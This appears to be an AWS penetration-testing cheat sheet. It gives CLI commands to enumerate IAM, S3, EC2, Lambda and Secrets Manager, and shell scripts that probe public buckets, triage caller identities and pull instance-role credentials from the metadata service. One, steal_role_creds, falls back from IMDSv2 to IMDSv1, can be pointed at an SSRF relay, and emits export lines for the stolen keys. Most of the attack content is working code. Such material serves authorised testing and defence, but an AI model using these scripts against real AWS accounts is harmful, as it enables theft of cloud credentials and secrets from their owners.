
AWS Pentesting

AWS environments are commonly compromised through misconfigured IAM permissions, publicly exposed S3 buckets, and Server-Side Request Forgery (SSRF) that reaches the EC2 Instance Metadata Service (IMDS) and reads the instance role's temporary credentials.

Initial Access & Enumeration

AWS CLI Configuration. Use a named profile so that the credentials under test do not overwrite your own default profile.

bash
aws configure --profile target
# Enter Access Key ID, Secret Access Key, Region
# Then pass --profile target on every command, or export AWS_PROFILE=target

Check current identity.

bash
aws sts get-caller-identity

Enumerate IAM users, roles and groups. These calls need iam:List* rights; if they return AccessDenied, brute-force the permissions instead (see enumerate-iam under AWS Tools).

bash
aws iam list-users
aws iam list-roles
aws iam list-groups

Get user details.

bash
aws iam get-user --user-name target-user
aws iam list-attached-user-policies --user-name target-user
aws iam list-user-policies --user-name target-user

Enumerate S3 buckets.

bash
aws s3 ls
aws s3 ls s3://bucket-name --recursive

Check for public buckets (unauthenticated). A listing in the response means anyone can enumerate the bucket; an AccessDenied error does not rule out individually readable objects, so also try fetching known object keys.

bash
curl https://bucket-name.s3.amazonaws.com/
aws s3 ls s3://bucket-name --no-sign-request
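An added example, not code from the original page, that turns the unauthenticated curl check above into a small triage script: it classifies S3's answer (public listing, bucket exists but is private, bucket does not exist, redirect to another regional endpoint) and pulls the object keys out of a public listing. The XML bodies are constructed to match the real response shapes; the bucket name "example-bucket" is a placeholder.

```shell
#!/bin/sh
# Added example (not from the original page): probe a bucket anonymously and
# classify S3's answer. Needs only curl, tr, sed and grep.

# Constructed copy of what a publicly listable bucket returns.
SAMPLE_LISTING='<?xml version="1.0" encoding="UTF-8"?><ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/"><Name>example-bucket</Name><Contents><Key>backup.sql</Key><Size>10240</Size></Contents><Contents><Key>config/.env</Key><Size>212</Size></Contents></ListBucketResult>'

# Constructed copy of the error body for a bucket that exists but is private.
SAMPLE_DENIED='<?xml version="1.0" encoding="UTF-8"?><Error><Code>AccessDenied</Code><Message>Access Denied</Message></Error>'

# Map a raw response body to a verdict.
classify_s3_response() {
    case "$1" in
        *'<ListBucketResult'*)              echo "PUBLIC_LISTING" ;;  # anyone can list objects
        *'<Code>AccessDenied</Code>'*)      echo "ACCESS_DENIED" ;;   # bucket exists; objects may still be readable
        *'<Code>NoSuchBucket</Code>'*)      echo "NO_SUCH_BUCKET" ;;
        *'<Code>PermanentRedirect</Code>'*) echo "REDIRECT" ;;        # bucket is served from another regional endpoint
        *)                                  echo "UNKNOWN" ;;
    esac
}

# Print each object key from a listing, one per line.
# Splitting on '<' turns every "<Key>name</Key>" into a "Key>name" token.
list_keys() {
    printf '%s' "$1" | tr '<' '\n' | sed -n 's/^Key>//p'
}

# Count the keys in a body (0 when it is not a listing).
count_keys() {
    list_keys "$1" | grep -c . || :
}

# Live check of one bucket name (needs network); uses the same
# virtual-hosted URL as the curl command on the page.
probe_bucket() {
    body=$(curl -s "https://$1.s3.amazonaws.com/")
    verdict=$(classify_s3_response "$body")
    echo "$1: $verdict"
    if [ "$verdict" = "PUBLIC_LISTING" ]; then
        list_keys "$body" | head -n 20
    fi
}
```

Usage: `probe_bucket example-bucket`. The classifier keys on S3's own error codes rather than HTTP status, because a 403 is returned both for private buckets and for some listing-denied-but-object-readable configurations.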

EC2 enumeration.

bash
aws ec2 describe-instances
aws ec2 describe-security-groups
aws ec2 describe-vpcs

Lambda functions. get-function returns the configuration, including environment variables (a frequent home for secrets), plus a presigned URL for downloading the deployment package.

bash
aws lambda list-functions
aws lambda get-function --function-name target-function

Secrets Manager.

bash
aws secretsmanager list-secrets
aws secretsmanager get-secret-value --secret-id secret-name
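The enumeration commands above assume the caller is an IAM user. Credentials recovered from an instance, a Lambda function or a CI job belong to an assumed role instead, and the matching commands are the iam *-role-* variants. The added example below, which is not code from the original page, reads the output of sts get-caller-identity, classifies the principal from its ARN and prints the enumeration commands that apply. The two identity documents are constructed samples; account 123456789012 and the names target-user and web-app-role are placeholders.

```shell
#!/bin/sh
# Added example (not from the original page): decide which IAM enumeration
# commands apply to the principal behind a set of credentials.

# Constructed get-caller-identity output for an IAM user.
SAMPLE_USER_IDENTITY='{
    "UserId": "AIDAEXAMPLEUSERID",
    "Account": "123456789012",
    "Arn": "arn:aws:iam::123456789012:user/target-user"
}'

# Constructed get-caller-identity output for an assumed role (e.g. IMDS credentials).
SAMPLE_ROLE_IDENTITY='{
    "UserId": "AROAEXAMPLEROLEID:i-0abc1234",
    "Account": "123456789012",
    "Arn": "arn:aws:sts::123456789012:assumed-role/web-app-role/i-0abc1234"
}'

# Pull one string field out of flat JSON such as CLI output.
json_field() {
    printf '%s' "$1" | tr -d '\n' | sed -n "s/.*\"$2\" *: *\"\([^\"]*\)\".*/\1/p"
}

# Print "<type> <name>" for a caller ARN:
#   user target-user | role web-app-role | root - | unknown <resource>
principal_from_arn() {
    resource="${1##*:}"                      # text after the last colon
    case "$resource" in
        user/*)         echo "user ${resource##*/}" ;;                        # drop any path
        assumed-role/*) name="${resource#assumed-role/}"; echo "role ${name%%/*}" ;;  # strip session name
        role/*)         echo "role ${resource##*/}" ;;
        root)           echo "root -" ;;
        *)              echo "unknown $resource" ;;
    esac
}

# Emit (do not run) the enumeration commands for the principal behind an ARN.
plan_enumeration() {
    arn="$1"
    set -- $(principal_from_arn "$arn")
    kind="$1"; name="$2"
    case "$kind" in
        user)
            echo "aws iam list-attached-user-policies --user-name $name"
            echo "aws iam list-user-policies --user-name $name"
            echo "aws iam list-groups-for-user --user-name $name"
            ;;
        role)
            echo "aws iam get-role --role-name $name"
            echo "aws iam list-attached-role-policies --role-name $name"
            echo "aws iam list-role-policies --role-name $name"
            ;;
        root)
            echo "# root credentials: every API call is allowed, nothing to enumerate"
            ;;
        *)
            echo "# unrecognised principal: $arn"
            ;;
    esac
}

# Live use: identify the current credentials and print the plan.
triage_current_creds() {
    identity=$(aws sts get-caller-identity --output json) || return 1
    echo "# account $(json_field "$identity" Account): $(principal_from_arn "$(json_field "$identity" Arn)")"
    plan_enumeration "$(json_field "$identity" Arn)"
}
```

Usage: `triage_current_creds`. For an assumed role, get-role also returns the trust policy, which shows who else can assume it and is the first thing to read when looking for a privilege-escalation path.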

Metadata Service Exploitation

EC2 Instance Metadata Service (IMDS). Version 1 answers any plain GET to 169.254.169.254, so an SSRF, an open proxy or a misconfigured reverse proxy on the instance can read it, including the role credentials. Version 2 requires a session token obtained with a PUT request (shown below), which most SSRF primitives cannot send.

List the available metadata categories.

bash
curl http://169.254.169.254/latest/meta-data/

Get IAM role credentials. The first request returns the name of the attached role; the second returns its temporary credentials.

bash
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE-NAME

Response contains AccessKeyId, SecretAccessKey, Token.

json
{
  "Code" : "Success",
  "LastUpdated" : "...",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA...",
  "SecretAccessKey" : "...",
  "Token" : "...",
  "Expiration" : "..."
}

Use stolen credentials. All three variables are required: these are temporary credentials (the key ID starts with ASIA), and AWS rejects them without the session token. They stop working at Expiration, normally within six hours, so re-read the metadata endpoint for a fresh set when needed.

bash
export AWS_ACCESS_KEY_ID="ASIAXXX"
export AWS_SECRET_ACCESS_KEY="xxx"
export AWS_SESSION_TOKEN="xxx"

IMDSv2 (requires a token). The TTL header is mandatory and 21600 seconds is the maximum. The token response is sent with an IP hop limit that defaults to 1, so it does not survive a network hop such as a Docker bridge, and a plain SSRF cannot issue the PUT at all.

bash
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/
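An added example, not code from the original page, that chains the IMDS steps above into one script: it tries IMDSv2 first, falls back to IMDSv1 when no token can be obtained, validates the credential document and prints the export lines from the "Use stolen credentials" step. The credential document is a constructed sample in the response format shown above; the endpoint variable IMDS is an assumption so the same code can be pointed at a proxy or SSRF relay.

```shell
#!/bin/sh
# Added example (not from the original page): fetch the instance role's
# credentials, preferring IMDSv2 and falling back to IMDSv1, then turn the
# JSON into the environment variables the AWS CLI reads.

IMDS="http://169.254.169.254"   # assumption: overridable, e.g. for an SSRF relay

# Constructed sample in the format the credentials endpoint returns.
SAMPLE_CREDS='{
  "Code" : "Success",
  "LastUpdated" : "2024-01-01T00:00:00Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAEXAMPLEKEYID0001",
  "SecretAccessKey" : "EXAMPLESECRETKEYEXAMPLESECRETKEYEXAMPLE0",
  "Token" : "EXAMPLESESSIONTOKEN",
  "Expiration" : "2024-01-01T06:00:00Z"
}'

# Pull one string field out of flat JSON.
json_field() {
    printf '%s' "$1" | tr -d '\n' | sed -n "s/.*\"$2\" *: *\"\([^\"]*\)\".*/\1/p"
}

# GET a metadata path. Try IMDSv2 (PUT for a token, then send it as a header);
# if the PUT fails (IMDSv1-only instance, or a path that cannot issue PUT),
# fall back to a plain GET, which is exactly what IMDSv1 allows.
imds_get() {
    path="$1"
    token=$(curl -s -f -X PUT "$IMDS/latest/api/token" \
        -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || true)
    if [ -n "$token" ]; then
        curl -s -f -H "X-aws-ec2-metadata-token: $token" "$IMDS/latest/meta-data/$path"
    else
        curl -s -f "$IMDS/latest/meta-data/$path"
    fi
}

# Validate a credential document and print export lines for it.
# Returns 1 if it is not a successful credential response.
creds_to_exports() {
    doc="$1"
    [ "$(json_field "$doc" Code)" = "Success" ] || return 1
    key=$(json_field "$doc" AccessKeyId)
    case "$key" in ASIA*) ;; *) return 1 ;; esac   # IMDS only hands out temporary (ASIA) keys
    printf 'export AWS_ACCESS_KEY_ID="%s"\n' "$key"
    printf 'export AWS_SECRET_ACCESS_KEY="%s"\n' "$(json_field "$doc" SecretAccessKey)"
    printf 'export AWS_SESSION_TOKEN="%s"\n' "$(json_field "$doc" Token)"
    printf '# expires %s\n' "$(json_field "$doc" Expiration)"
}

# Full chain against a live instance: role name, then its credentials.
steal_role_creds() {
    role=$(imds_get iam/security-credentials/)
    [ -n "$role" ] || { echo "no role attached to this instance" >&2; return 1; }
    creds_to_exports "$(imds_get "iam/security-credentials/$role")"
}
```

Usage on the instance (or through a relay that sets IMDS): `eval "$(steal_role_creds)" && aws sts get-caller-identity`. The fallback order matters in the other direction too: if only the plain GET works, the instance is still on IMDSv1 and that is a finding in itself.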

AWS Tools

Pacu

Exploitation

An open-source AWS exploitation framework from Rhino Security Labs, designed for testing the security of Amazon Web Services environments. It runs modules for enumeration, privilege escalation and persistence against an account using credentials you supply.

Installation

bash
pip3 install pacu

enumerate-iam

Enumeration

Brute-forces the IAM permissions of a set of credentials by attempting a large list of read-only API calls and recording which succeed. Useful when the caller lacks the iam:List* and iam:Get* rights needed for the direct enumeration above.

Installation

bash
pip install enumerate-iam

S3Scanner

Scanning

Scan for open S3 buckets and dump the contents.

Installation

bash
pip install s3scanner

CloudMapper

Visualization

Analyzes an AWS environment from the defender's side: generates network diagrams of VPCs, subnets and security groups and runs audit checks for common misconfigurations.

Installation

bash
pip install cloudmapper